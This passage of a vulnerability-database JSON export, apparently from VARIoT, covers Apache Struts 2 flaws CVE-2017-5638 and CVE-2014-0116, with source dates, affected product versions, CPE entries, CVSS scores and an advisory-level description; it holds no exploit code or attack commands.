          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-03-14T00:00:00",
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "date": "2017-03-14T00:00:00",
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "date": "2017-03-11T00:00:00",
            "db": "VULMON",
            "id": "CVE-2017-5638"
          },
          {
            "date": "2017-03-06T00:00:00",
            "db": "BID",
            "id": "96729"
          },
          {
            "date": "2017-04-07T18:18:00",
            "db": "PACKETSTORM",
            "id": "142055"
          },
          {
            "date": "2017-03-30T16:04:25",
            "db": "PACKETSTORM",
            "id": "141863"
          },
          {
            "date": "2017-03-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201703-152"
          },
          {
            "date": "2017-03-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-001621"
          },
          {
            "date": "2017-03-11T02:59:00.150000",
            "db": "NVD",
            "id": "CVE-2017-5638"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-03-14T00:00:00",
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "date": "2017-03-14T00:00:00",
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2017-5638"
          },
          {
            "date": "2017-05-26T07:00:00",
            "db": "BID",
            "id": "96729"
          },
          {
            "date": "2021-02-25T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201703-152"
          },
          {
            "date": "2017-10-03T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-001621"
          },
          {
            "date": "2025-10-22T00:16:06.887000",
            "db": "NVD",
            "id": "CVE-2017-5638"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-152"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Apache Struts 2 is vulnerable to remote code execution",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          },
          {
            "db": "CERT/CC",
            "id": "VU#834067"
          }
        ],
        "trust": 1.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Input Validation Error",
        "sources": [
          {
            "db": "BID",
            "id": "96729"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-152"
          }
        ],
        "trust": 0.9
      }
    }

    VAR-201405-0502

    Vulnerability from variot - Updated: 2025-04-13 23:31

    CookieInterceptor in Apache Struts 2.x before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and modify session state via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0113. This vulnerability CVE-2014-0113 Vulnerability due to insufficient fix for.Through a crafted request by a third party, ClassLoader The " operation " And the session state may change. Apache Struts is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. Apache Struts versions 2.0.0 through 2.3.16.2 are vulnerable

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201405-0502",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "apache",
            "version": "2.3.16.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "apache",
            "version": "2.3.15.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "apache",
            "version": "2.3.8"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "apache",
            "version": "2.3.7"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "apache",
            "version": "2.3.4.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "apache",
            "version": "2.3.15.3"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "apache",
            "version": "2.3.3"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "apache",
            "version": "2.3.15.2"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "apache",
            "version": "2.3.16.2"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "apache",
            "version": "2.3.4"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.4"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.7"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.10"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.2"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.3"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.1.5"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.1.8.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.11.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.9"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.14"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.8"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.2.1.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.11.2"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.2.3.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.3.12"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.3.15"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.1.2"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.5"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.3.14"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.11"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.6"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.3.1.2"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.3.14.2"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.3.14.3"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.1.0"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.1.3"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.0"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.13"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.1.8"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.3.14.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.3.16"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.3.1.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.2.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.12"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.3.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.2.3"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.1.1"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.1.6"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.1.4"
          },
          {
            "model": "webotx portal",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v9.1"
          },
          {
            "model": "infocage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "security risk management  v1.0.0 to  v2.1.3"
          },
          {
            "model": "serverview",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "resource orchestrator"
          },
          {
            "model": "interstage service integrator",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apache",
            "version": "2.3.16.3"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "web edition v5.1 to  v5.2"
          },
          {
            "model": "interstage application server",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "interstage apworks",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "ibm",
            "version": "4.5"
          },
          {
            "model": "systemwalker software configuration manager",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "infocage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "pc security"
          },
          {
            "model": "webotx application server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v7.1"
          },
          {
            "model": "symfoware",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "analytics server"
          },
          {
            "model": "interstage application framework suite",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "interstage application development cycle manager",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "struts",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "apache",
            "version": "2.x"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "rfid manager lite v2.0"
          },
          {
            "model": "interstage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "business analytics modeling server"
          },
          {
            "model": "mysql",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "oracle",
            "version": "enterprise monitor 3.0.10 and earlier"
          },
          {
            "model": "webotx portal",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "v8.3 to  v8.4"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "web edition v6.1 to  v6.5"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "enterprise edition v6.1 to  v6.5"
          },
          {
            "model": "systemwalker service catalog manager",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "esmpro/servermanager",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "nec",
            "version": "ver5.75 and earlier"
          },
          {
            "model": "cloud infrastructure management software",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "st ard-j edition v5.1 to  v5.2"
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "mysql",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "oracle",
            "version": "enterprise monitor 2.3.16 and earlier"
          },
          {
            "model": "interstage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "business process manager analytics"
          },
          {
            "model": "integrated system ha database ready",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "triole",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "cloud middle set  b set"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "rfid manager st ard v2.0"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "st ard-j edition v6.1 to  v6.5"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "st ard edition v6.1 to  v6.5"
          },
          {
            "model": "connections",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "ibm",
            "version": "3.0.1.1 and earlier"
          },
          {
            "model": "interstage studio",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "rfid manager enterprise v7.1"
          },
          {
            "model": "interstage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "extreme transaction processing server"
          },
          {
            "model": "interstage business application server",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "connections",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "st ard edition v5.1 to  v5.2"
          },
          {
            "model": "webotx developer",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "\"v8.2 to  v8.4 (with developers studio only )\""
          },
          {
            "model": "interstage",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "mobile manager"
          },
          {
            "model": "systemwalker service quality coordinator",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "symfoware",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": "server"
          },
          {
            "model": "webotx",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "enterprise edition v5.1 to  v5.2"
          },
          {
            "model": "webotx developer",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "nec",
            "version": "\"v9.1 to  v9.2 (with developers studio only )\""
          },
          {
            "model": "interstage job workload server",
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.11"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.1.2"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.11"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.7"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.8"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.2"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.4"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.3"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.6"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.5"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.14"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.3.1"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.9"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.8"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.1"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.1.1"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.1"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.3"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.8.1"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.4"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.2"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.5"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.12"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.6"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.13"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.10"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.11.2"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.11.1"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2.3"
          },
          {
            "model": "software foundation struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.2"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "67218"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002411"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201405-150"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0116"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:apache:struts",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:ibm:connections",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:oracle:mysql",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:esmpro_servermanager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:infocage",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:webotx",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:webotx_application_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:webotx_developer",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:webotx_portal",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:integrated_system_ha_database_ready",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_application_development_cycle_manager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_application_framework_suite",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_application_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_apworks",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_business_application_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_job_workload_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_service_integrator",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_studio",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:serverview",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:symfoware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:systemwalker_service_catalog_manager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:systemwalker_service_quality_coordinator",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:systemwalker_software_configuration_manager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:triole",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:cloud_infrastructure_management_software",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002411"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Zubair Ashraf of IBM X-Force",
        "sources": [
          {
            "db": "BID",
            "id": "67218"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2014-0116",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2014-0116",
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.9,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2014-0116",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2014-0116",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201405-150",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2014-0116",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0116"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002411"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201405-150"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0116"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "CookieInterceptor in Apache Struts 2.x before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and modify session state via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0113. This vulnerability CVE-2014-0113 Vulnerability due to insufficient fix for.Through a crafted request by a third party, ClassLoader The \" operation \" And the session state may change. Apache Struts is prone to a security-bypass vulnerability. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. \nApache Struts versions 2.0.0 through 2.3.16.2 are vulnerable",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-0116"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002411"
          },
          {
            "db": "BID",
            "id": "67218"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-0116"
          }
        ],
        "trust": 1.98
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2014-0116",
            "trust": 2.8
          },
          {
            "db": "BID",
            "id": "67218",
            "trust": 2.0
          },
          {
            "db": "SECUNIA",
            "id": "59816",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002411",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201405-150",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-0116",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0116"
